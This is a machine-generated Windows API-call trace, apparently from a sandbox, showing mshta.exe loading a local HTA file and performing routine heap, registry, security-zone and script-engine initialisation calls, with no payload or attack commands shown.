[0080.709] NtdllDefWindowProc_W () returned 0x0
[0080.709] GetCurrentThreadId () returned 0xe84
[0080.709] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x144f30, hWnd=0x1034a, phIMC=0x39f9d4 | out: phIMC=0x39f9d4*=0x230103) returned 0x0
[0080.709] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x144f30, hWnd=0x1034a, hIME=0x0, phPrev=0x39f9d4 | out: phPrev=0x39f9d4*=0x230103) returned 0x0
[0080.709] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x60) returned 0x151370
[0080.710] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151370 | out: hHeap=0x110000) returned 1
[0080.710] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x60) returned 0x151370
[0080.711] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151370 | out: hHeap=0x110000) returned 1
[0080.711] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1527e8 | out: hHeap=0x110000) returned 1
[0080.711] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1527b8 | out: hHeap=0x110000) returned 1
[0080.711] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.712] GetMessageTime () returned 0
[0080.712] GetMessagePos () returned 0x0
[0080.712] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x39f6bc | out: plResult=0x39f6bc) returned 0x0
[0080.712] GetCurrentThreadId () returned 0xe84
[0080.712] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0080.712] GetMessageTime () returned 0
[0080.712] GetMessagePos () returned 0x0
[0080.712] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x144f30, hWnd=0x1034a, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x39f6bc | out: plResult=0x39f6bc) returned 0x0
[0080.713] GetCurrentThreadId () returned 0xe84
[0080.713] IsOS (dwOS=0x25) returned 1
[0080.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f8c8 | out: phkResult=0x39f8c8*=0x200) returned 0x0
[0080.713] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x39f8cc | out: phkResult=0x39f8cc*=0x204) returned 0x0
[0080.713] RegOpenKeyExW (in: hKey=0x204, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x39f888 | out: phkResult=0x39f888*=0x0) returned 0x2
[0080.713] RegOpenKeyExW (in: hKey=0x200, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x39f888 | out: phkResult=0x39f888*=0x208) returned 0x0
[0080.714] SHRegGetValueW () returned 0x0
[0080.714] RegCloseKey (hKey=0x208) returned 0x0
[0080.714] RegCloseKey (hKey=0x0) returned 0x6
[0080.714] RegCloseKey (hKey=0x0) returned 0x6
[0080.714] RegCloseKey (hKey=0x200) returned 0x0
[0080.714] RegCloseKey (hKey=0x204) returned 0x0
[0080.714] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x747d0000
[0082.132] GetVersionExW (in: lpVersionInformation=0x39f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x39f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0082.132] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x747d0000
[0082.132] LoadStringW (in: hInstance=0x747d0000, uID=0xb5, lpBuffer=0x39f950, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0082.336] LoadStringW (in: hInstance=0x747d0000, uID=0xb5, lpBuffer=0x39f9b0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0082.336] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x1527b8
[0082.337] LoadStringW (in: hInstance=0x747d0000, uID=0xb5, lpBuffer=0x39f99c, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0082.337] ShowWindow (hWnd=0x1034a, nCmdShow=1) returned 1
[0082.337] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13dec0 | out: hHeap=0x110000) returned 1
[0082.337] GetMessageW (in: lpMsg=0x39fc0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x39fc0c) returned 1
[0082.337] TranslateMessage (lpMsg=0x39fc0c) returned 0
[0082.337] DispatchMessageW (lpMsg=0x39fc0c) returned 0x0
[0082.337] CreateUri (in: pwzURI="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x39e384 | out: ppURI=0x39e384*=0x13c184) returned 0x0
[0082.338] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39e35c | out: ppvObject=0x39e35c*=0x13c184) returned 0x0
[0082.338] IUnknown:Release (This=0x13c184) returned 0x4
[0082.338] IUnknown:AddRef (This=0x13c184) returned 0x5
[0082.338] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x68) returned 0x1546a0
[0082.338] IUnknown:Release (This=0x13c184) returned 0x4
[0082.338] IUnknown:Release (This=0x13c184) returned 0x3
[0082.338] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x100) returned 0x175b98
[0082.338] FindResourceW (hModule=0x747d0000, lpName=0x1fe, lpType=0x6) returned 0x2ab6c18
[0082.338] LoadResource (hModule=0x747d0000, hResInfo=0x2ab6c18) returned 0x2adcc84
[0082.338] LockResource (hResData=0x2adcc84) returned 0x2adcc84
[0082.338] VirtualQuery (in: lpAddress=0x2adcc84, lpBuffer=0x39f52c, dwLength=0x1c | out: lpBuffer=0x39f52c*(BaseAddress=0x2adc000, AllocationBase=0x2ab0000, AllocationProtect=0x8, RegionSize=0x104000, State=0x1000, Protect=0x8, Type=0x40000)) returned 0x1c
[0082.339] SizeofResource (hModule=0x747d0000, hResInfo=0x2ab6c18) returned 0xe6
[0082.339] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1546a0 | out: hHeap=0x110000) returned 1
[0082.339] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x175b98, Size=0x86) returned 0x175b98
[0082.339] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8a) returned 0x170fe8
[0082.340] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f6e8 | out: ppu=0x39f6e8) returned 0x0
[0082.340] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.340] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.340] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.340] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x1527e8
[0082.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e188
[0082.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13dec0
[0082.341] SetTimer (hWnd=0x1034a, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0082.341] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.341] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e1e0
[0082.341] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e1e0 | out: hHeap=0x110000) returned 1
[0082.341] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.341] IUnknown:AddRef (This=0x13c184) returned 0x4
[0082.341] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f5f4, dwFlags=0x0 | out: pdwZone=0x39f5f4*=0xffffffff) returned 0x800c0011
[0082.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.341] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.341] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0082.342] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x2106, pPolicy=0x39f5f8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x39f5f8*=0x0) returned 0x0
[0082.342] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.342] IUnknown:Release (This=0x13c184) returned 0x3
[0082.342] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13dec0 | out: hHeap=0x110000) returned 1
[0082.342] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x152818
[0082.342] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e1e0
[0082.342] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x13dec0
[0082.342] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x68) returned 0x1546a0
[0082.342] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x12d908
[0082.342] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e238
[0082.343] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1546a0 | out: hHeap=0x110000) returned 1
[0082.343] GetSystemDefaultLCID () returned 0x409
[0082.343] GetVersionExW (in: lpVersionInformation=0x39f6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x4c, dwMinorVersion=0x117688, dwBuildNumber=0x0, dwPlatformId=0x11e670, szCSDVersion="獸\x11環\x11\x14窰\x11璼\x119篨\x11ﭴ9\x14ⲁ瞡\x14") | out: lpVersionInformation=0x39f6f0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0082.343] GetKeyboardLayoutList (in: nBuff=32, lpList=0x39f670 | out: lpList=0x39f670) returned 1
[0082.343] GetSystemMetrics (nIndex=4096) returned 0
[0082.343] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0c8
[0082.343] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ac
[0082.343] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0af
[0082.343] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c3
[0082.343] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c4
[0082.343] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c2
[0082.343] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc073
[0082.343] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0cc
[0082.343] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x2c) returned 0x166df0
[0082.343] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e290
[0082.343] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x64) returned 0x1546a0
[0082.343] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x152848
[0082.344] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163c60
[0082.344] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163c80
[0082.344] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x173fb8
[0082.344] lstrlenW (lpString="font-color: #000") returned 16
[0082.344] IsCharSpaceW (wch=0x66) returned 0
[0082.344] IsCharAlphaNumericW (ch=0x3a) returned 0
[0082.344] IsCharSpaceW (wch=0x3a) returned 0
[0082.344] IsCharAlphaNumericW (ch=0x3a) returned 0
[0082.344] IsCharSpaceW (wch=0x20) returned 1
[0082.344] IsCharSpaceW (wch=0x23) returned 0
[0082.344] IsCharAlphaNumericW (ch=0x23) returned 0
[0082.344] IsCharAlphaNumericW (ch=0x30) returned 1
[0082.344] IsCharAlphaNumericW (ch=0x0) returned 0
[0082.350] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x22) returned 0x152878
[0082.350] IsCharSpaceW (wch=0x30) returned 0
[0082.350] IsCharSpaceW (wch=0x23) returned 0
[0082.350] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x16a1b8
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174000
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1e) returned 0x16d9f8
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x26) returned 0x1528a8
[0082.351] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16d9f8 | out: hHeap=0x110000) returned 1
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e2e8
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x1528d8
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x152908
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163ca0
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163cc0
[0082.351] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174048
[0082.352] lstrlenW (lpString="font-color: #000") returned 16
[0082.352] IsCharSpaceW (wch=0x66) returned 0
[0082.352] IsCharAlphaNumericW (ch=0x3a) returned 0
[0082.352] IsCharSpaceW (wch=0x3a) returned 0
[0082.352] IsCharAlphaNumericW (ch=0x3a) returned 0
[0082.352] IsCharSpaceW (wch=0x20) returned 1
[0082.352] IsCharSpaceW (wch=0x23) returned 0
[0082.352] IsCharAlphaNumericW (ch=0x23) returned 0
[0082.352] IsCharAlphaNumericW (ch=0x30) returned 1
[0082.352] IsCharAlphaNumericW (ch=0x0) returned 0
[0082.352] IsCharSpaceW (wch=0x30) returned 0
[0082.352] IsCharSpaceW (wch=0x23) returned 0
[0082.352] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x16a1d0
[0082.352] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174090
[0082.352] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x10) returned 0x16a1e8
[0082.352] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x18) returned 0x163ce0
[0082.352] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16a1e8 | out: hHeap=0x110000) returned 1
[0082.352] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e340
[0082.352] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x13dec0, Size=0x18) returned 0x163d00
[0082.353] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x152938
[0082.353] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x152968
[0082.353] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163d20
[0082.353] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163d40
[0082.353] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x1740d8
[0082.353] lstrlenW (lpString="font-color: #fff") returned 16
[0082.353] IsCharSpaceW (wch=0x66) returned 0
[0082.353] IsCharAlphaNumericW (ch=0x3a) returned 0
[0082.353] IsCharSpaceW (wch=0x3a) returned 0
[0082.353] IsCharAlphaNumericW (ch=0x3a) returned 0
[0082.353] IsCharSpaceW (wch=0x20) returned 1
[0082.353] IsCharSpaceW (wch=0x23) returned 0
[0082.353] IsCharAlphaNumericW (ch=0x23) returned 0
[0082.353] IsCharAlphaNumericW (ch=0x0) returned 0
[0082.353] IsCharSpaceW (wch=0x66) returned 0
[0082.353] IsCharSpaceW (wch=0x23) returned 0
[0082.353] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xa) returned 0x13dec0
[0082.353] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x174120
[0082.354] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x36) returned 0x14f7b8
[0082.354] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x3e) returned 0x174168
[0082.354] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14f7b8 | out: hHeap=0x110000) returned 1
[0082.354] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e398
[0082.355] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x158d00 | out: hHeap=0x110000) returned 1
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x152998
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x68) returned 0x154710
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x14) returned 0x163d60
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x16) returned 0x163d80
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x40) returned 0x1741b0
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e3f0
[0082.355] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x163d00, Size=0x24) returned 0x1529c8
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4c) returned 0x14e448
[0082.355] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x800) returned 0x175c28
[0082.356] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x175c28, Size=0xc00) returned 0x175c28
[0082.356] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x175c28, Size=0x1256) returned 0x175c28
[0082.356] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x100a) returned 0x176e88
[0082.357] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.357] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e4a0
[0082.357] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4a0 | out: hHeap=0x110000) returned 1
[0082.357] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.357] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e4a0
[0082.358] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4a0 | out: hHeap=0x110000) returned 1
[0082.358] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.358] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e4a0
[0082.358] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4a0 | out: hHeap=0x110000) returned 1
[0082.358] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.358] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x100) returned 0x158d00
[0082.359] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.359] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x1679a8, Size=0x6c) returned 0x177ea0
[0082.359] RedrawWindow (hWnd=0x1034a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1
[0082.359] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e4a0
[0082.360] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4a0 | out: hHeap=0x110000) returned 1
[0082.361] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.361] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e4a0
[0082.361] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4a0 | out: hHeap=0x110000) returned 1
[0082.361] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.361] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e4a0
[0082.362] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4a0 | out: hHeap=0x110000) returned 1
[0082.362] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.362] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e4a0
[0082.362] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e4a0 | out: hHeap=0x110000) returned 1
[0082.362] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0082.362] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f830 | out: ppu=0x39f830) returned 0x0
[0082.362] IUnknown:AddRef (This=0x13c184) returned 0x4
[0082.363] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f7d4, dwFlags=0x0 | out: pdwZone=0x39f7d4*=0xffffffff) returned 0x800c0011
[0082.363] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.363] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.363] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0082.363] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f7d8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f7d8*=0x0) returned 0x0
[0082.363] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.363] IUnknown:Release (This=0x13c184) returned 0x3
[0082.363] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1529c8 | out: hHeap=0x110000) returned 1
[0082.364] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f7ec | out: ppu=0x39f7ec) returned 0x0
[0082.364] IUnknown:AddRef (This=0x13c184) returned 0x4
[0082.364] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f78c, dwFlags=0x0 | out: pdwZone=0x39f78c*=0xffffffff) returned 0x800c0011
[0082.364] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.364] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.364] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0082.364] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f790, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f790*=0x0) returned 0x0
[0082.364] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.364] IUnknown:Release (This=0x13c184) returned 0x3
[0082.364] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f77c | out: ppu=0x39f77c) returned 0x0
[0082.364] IUnknown:AddRef (This=0x13c184) returned 0x4
[0082.364] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f71c, dwFlags=0x0 | out: pdwZone=0x39f71c*=0xffffffff) returned 0x800c0011
[0082.364] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.364] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.364] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0082.365] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f720, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f720*=0x0) returned 0x0
[0082.365] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0082.365] IUnknown:Release (This=0x13c184) returned 0x3
[0082.365] CoCreateInstance (in: rclsid=0x39f76c*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x739c95b4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x39f728 | out: ppv=0x39f728*=0x29b0488) returned 0x0
[0082.699] malloc (_Size=0x80) returned 0x5fd9d0
[0082.699] GetVersion () returned 0x1db10106
[0082.699] __dllonexit () returned 0x663c7ecf
[0082.699] __dllonexit () returned 0x663c7e9b
[0082.699] __dllonexit () returned 0x663c7eb5
[0082.700] __dllonexit () returned 0x663c7f70
[0082.700] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76c20000
[0082.700] GetProcAddress (hModule=0x76c20000, lpProcName="RegisterTraceGuidsA") returned 0x77a4848f
[0082.700] EtwRegisterTraceGuidsA () returned 0x0
[0082.700] GetProcAddress (hModule=0x76c20000, lpProcName="RegisterTraceGuidsA") returned 0x77a4848f
[0082.700] EtwRegisterTraceGuidsA () returned 0x0
[0082.701] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x39e0e4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0082.701] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907
[0082.701] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x39e208 | out: phkResult=0x39e208*=0x0) returned 0x2
[0082.707] GetVersion () returned 0x1db10106
[0082.708] DllGetClassObject (in: rclsid=0x13fa2c*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x76ecee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39e9f4 | out: ppv=0x39e9f4*=0x5f13c0) returned 0x0
[0082.708] ??2@YAPAXI@Z () returned 0x5f13c0
